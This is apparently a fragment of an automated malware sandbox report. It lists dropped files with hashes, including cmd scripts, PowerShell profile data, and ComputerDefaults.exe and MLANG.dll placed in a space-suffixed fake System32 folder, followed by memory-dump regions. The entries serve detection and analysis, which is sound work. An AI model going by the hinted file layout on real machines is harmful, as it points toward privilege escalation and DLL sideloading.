        SHA1

        6594b85a70f998f79f43cdf1ca56137997534156

        SHA256

        9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

        SHA512

        8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        19KB

        MD5

        313cc50164ee0cf3577ce4bcfc2ba9e4

        SHA1

        b692779a501806e6c17ea82b8c23fca40470800c

        SHA256

        3c36507c915846e12b714c75a63f6f71bb0458b1ef50965f7c9fc02b94ec6a0f

        SHA512

        083aee821296cb88454a5012ea12a5da7a7b69fcbf00f947fb449e991f7ad8dfc8d294aedada119397fde80e31639c6fe9601bd555933b5564c37f0d63cd6f01

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        19KB

        MD5

        8be9775f49499ba75f94dace04a7a870

        SHA1

        5c80c5674ec75fb115f37f5a3d0e92edec631aac

        SHA256

        ad23aedd8d426551041feef18edf1bcbe1902f210c5f216a0503fee356630d52

        SHA512

        a0702bc5f7887e88347c361338e29e403478d7b3e604a05b7eb925c54a253a73788e6a63f79fe2798767143a0546e3e30790704a1c00188b81766e9960e2b207

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        21KB

        MD5

        f1e3d0f7d6cb0caa4a5afef20578f774

        SHA1

        8c0f28a13f154e7330cea83885b827f5c17f8d33

        SHA256

        0ea3b45846b96352a0742b629f4a0ca4f6b30012f39caf3cbd11629f84126904

        SHA512

        60a16f5964b30967bf2165eeef3994169b7bf80570ac1b3f7cd8c7079720814c4c71ce7f1ad187a5b19af35bbaf3ac81f4e52cc1c8caee72a7f657f5e28e7ac7

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        1KB

        MD5

        dd441d0a748b190d77c235b91b64d7ba

        SHA1

        da5b187be2db701d6bfd1ccb789a601662c9e522

        SHA256

        9963e74f79fefb376a2ec3b220376c166ce8afd175f132ba8e05b9f04a62b59c

        SHA512

        5dc4b30f3572d00d223f3113390a5fb3162ed58727a446895fb0a3364dd5bdf0f8262ee1c2e3d3344a6d1cbb20d3169dfdfa8e49e12d8d15bdc9f8818936a149

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        19KB

        MD5

        c20842afb589a45945f1bb6dbe891f88

        SHA1

        337477ce5697c31459bba2689b7595e0b2a5a17a

        SHA256

        ce12a090783525b73bdb4f7d9f234a166de774fe15415f1e3e00005c7823eaab

        SHA512

        bac39fac1c7ae64b951e0502ea26dd32f0c88df1c42edc8f6fd36f380f3d4bc09d7fd59b68c954a7fe2e6fef734e0e1169fd12a68a21ddc7f35007a5e380bd42

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        19KB

        MD5

        3f1a35a393ab3bc8379291119b0b3e15

        SHA1

        d04ad4cdb3796d775d16712126e6b7aac13fad40

        SHA256

        d9251632b486a75090b1a2c163cec2d7b5c29097117ea8a2136d5c2656e96593

        SHA512

        2efd750e0ef543e87c4dcd163121fa84b3077aeea19ee89b0bcabefe49a3f643a24a57922662551d4f5c989f66824e993764fd8fd52bbb70981c73643161a6f0

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        19KB

        MD5

        9f434cef13917caed127f993c3642226

        SHA1

        da178dad741559d848fc21d5857cce9ed812764c

        SHA256

        81a544243798f977840a726d04c82211498a35db5caa9528e5ec1e060f183714

        SHA512

        2323cef9d6438fec2768e483dc1b90400763e2bf08d2899c32f839c1d6095928df9481e874b2f22cdedb45a7313fdb074ade5ffd4bf21e418d9ef1dccee5a057

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        17KB

        MD5

        ab0c7108dcf3e45cb149d5a0eeca193d

        SHA1

        7e5dd5a4637386d9f42b34abc2e7f64f389176ed

        SHA256

        b21773727f5add75806d61e3f02ad02949fe123a466f4417689e2a21f965959a

        SHA512

        1df78035d047b2a81678a8556ad45a048bf8c566da4b8fc91430f5eab6ec8ffb5561771e8ad440dd979fba8682b528293f947db3a09ecf28057821c250591e9c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        21KB

        MD5

        962b163bebdfa04ad74132f5f81f08c5

        SHA1

        19269e7839b36ee19a9155f4535f6f9d49419ad0

        SHA256

        52e828b8f4c5f686a9ccdafec4efbcdcbcb47d89359c105b3f98701516aa7dbb

        SHA512

        c33a01915e66731becc46dfe94be31474ab64223bd7e5890415595fe6391d68950e50913c5538af46fe7d52606756a531c8261bdfee16d920237324fd9fa9b14

      • C:\Users\Admin\AppData\Local\Temp\SC.cmd

        Filesize

        537KB

        MD5

        d20bf8dba792e2edc3e0eb7e5c30b32b

        SHA1

        7094e6e59004962f3d3161aa3016ecfcf2b3a64f

        SHA256

        1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485

        SHA512

        c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hnhdyg1.pnm.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd

        Filesize

        1.6MB

        MD5

        d7239bc304b1d9d4ae192e2570419d53

        SHA1

        dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

        SHA256

        7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

        SHA512

        d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

      • C:\Windows \System32\ComputerDefaults.exe

        Filesize

        66KB

        MD5

        cfa65b13918526579371c138108a7ddb

        SHA1

        28bc560c542c405e08001f95c4ea0511e5211035

        SHA256

        4c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6

        SHA512

        7ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88

      • C:\Windows \System32\MLANG.dll

        Filesize

        93KB

        MD5

        dc73eb0945a5e0246479de101537c9d8

        SHA1

        b4a9d97c2c6a43944a92bc6356e9be2582918da7

        SHA256

        a1f6562dab180a4c2967eab04cf6f39e3f19c99068824230b7c32891da8aba73

        SHA512

        0bf6c18bc1bf62b3025128a419091ca3a0239bcfb519007549dfa350584890ccce30115cb9c3f72e647c3d4c142cec09bba8842e6666513f3358f2557fe96f29

      • memory/756-167-0x0000000006B00000-0x0000000006B22000-memory.dmp

        Filesize

        136KB

      • memory/1536-210-0x0000000070810000-0x000000007085C000-memory.dmp

        Filesize

        304KB

      • memory/2028-189-0x0000000070810000-0x000000007085C000-memory.dmp

        Filesize

        304KB

      • memory/3196-25-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

      • memory/3196-26-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

      • memory/3196-38-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

      • memory/3196-24-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

      • memory/3500-90-0x0000000007AA0000-0x0000000007BD2000-memory.dmp

        Filesize

        1.2MB

      • memory/3500-94-0x000000000A670000-0x000000000A67A000-memory.dmp

        Filesize

        40KB

      • memory/3500-113-0x000000000F290000-0x000000000F2A2000-memory.dmp

        Filesize

        72KB

      • memory/3500-108-0x000000000EBF0000-0x000000000F208000-memory.dmp

        Filesize

        6.1MB

      • memory/3500-114-0x000000000F2F0000-0x000000000F32C000-memory.dmp

        Filesize

        240KB

      • memory/3500-107-0x000000000E400000-0x000000000E5C2000-memory.dmp

        Filesize

        1.8MB

      • memory/3500-105-0x000000000A9A0000-0x000000000A9F0000-memory.dmp

        Filesize

        320KB

      • memory/3500-89-0x0000000002EA0000-0x0000000002EAC000-memory.dmp

        Filesize

        48KB

      • memory/3500-106-0x000000000AAB0000-0x000000000AB62000-memory.dmp

        Filesize

        712KB

      • memory/3500-91-0x0000000007BD0000-0x0000000007EF4000-memory.dmp

        Filesize

        3.1MB

      • memory/3500-92-0x000000000DC80000-0x000000000E224000-memory.dmp

        Filesize

        5.6MB

      • memory/3500-93-0x000000000A6E0000-0x000000000A772000-memory.dmp

        Filesize

        584KB

      • memory/3612-169-0x0000000070810000-0x000000007085C000-memory.dmp

        Filesize

        304KB

      • memory/4460-140-0x0000000006FD0000-0x0000000006FDA000-memory.dmp

        Filesize

        40KB

      • memory/4460-127-0x0000000006210000-0x0000000006242000-memory.dmp

        Filesize

        200KB

      • memory/4460-128-0x0000000070810000-0x000000007085C000-memory.dmp

        Filesize

        304KB

      • memory/4460-138-0x00000000061F0000-0x000000000620E000-memory.dmp

        Filesize

        120KB

      • memory/4460-139-0x0000000006E00000-0x0000000006EA3000-memory.dmp

        Filesize

        652KB

      • memory/4460-141-0x00000000071E0000-0x0000000007276000-memory.dmp

        Filesize

        600KB

      • memory/4460-142-0x0000000007150000-0x0000000007161000-memory.dmp

        Filesize

        68KB

      • memory/4608-20-0x0000000006360000-0x00000000063A4000-memory.dmp

        Filesize

        272KB

      • memory/4608-18-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

        Filesize

        120KB

      • memory/4608-21-0x00000000070D0000-0x0000000007146000-memory.dmp

        Filesize

        472KB

      • memory/4608-0-0x0000000074A7E000-0x0000000074A7F000-memory.dmp

        Filesize

        4KB

      • memory/4608-23-0x0000000007170000-0x000000000718A000-memory.dmp

        Filesize

        104KB

      • memory/4608-22-0x00000000077D0000-0x0000000007E4A000-memory.dmp

        Filesize

        6.5MB

      • memory/4608-39-0x00000000023B0000-0x00000000023BC000-memory.dmp

        Filesize

        48KB

      • memory/4608-40-0x0000000007300000-0x0000000007366000-memory.dmp

        Filesize

        408KB

      • memory/4608-41-0x0000000074A7E000-0x0000000074A7F000-memory.dmp

        Filesize

        4KB

      • memory/4608-19-0x0000000005E20000-0x0000000005E6C000-memory.dmp

        Filesize

        304KB

      • memory/4608-42-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

      • memory/4608-47-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

      • memory/4608-8-0x00000000056C0000-0x0000000005A14000-memory.dmp

        Filesize

        3.3MB

      • memory/4608-7-0x0000000004E10000-0x0000000004E76000-memory.dmp

        Filesize

        408KB

      • memory/4608-6-0x0000000004DA0000-0x0000000004E06000-memory.dmp

        Filesize

        408KB

      • memory/4608-222-0x0000000007670000-0x00000000076CC000-memory.dmp

        Filesize

        368KB

      • memory/4608-223-0x0000000008F50000-0x000000000900C000-memory.dmp

        Filesize

        752KB

      • memory/4608-5-0x0000000004D00000-0x0000000004D22000-memory.dmp

        Filesize

        136KB

      • memory/4608-4-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

      • memory/4608-3-0x0000000004F90000-0x00000000055B8000-memory.dmp

        Filesize

        6.2MB

      • memory/4608-2-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

      • memory/4608-1-0x00000000024B0000-0x00000000024E6000-memory.dmp

        Filesize

        216KB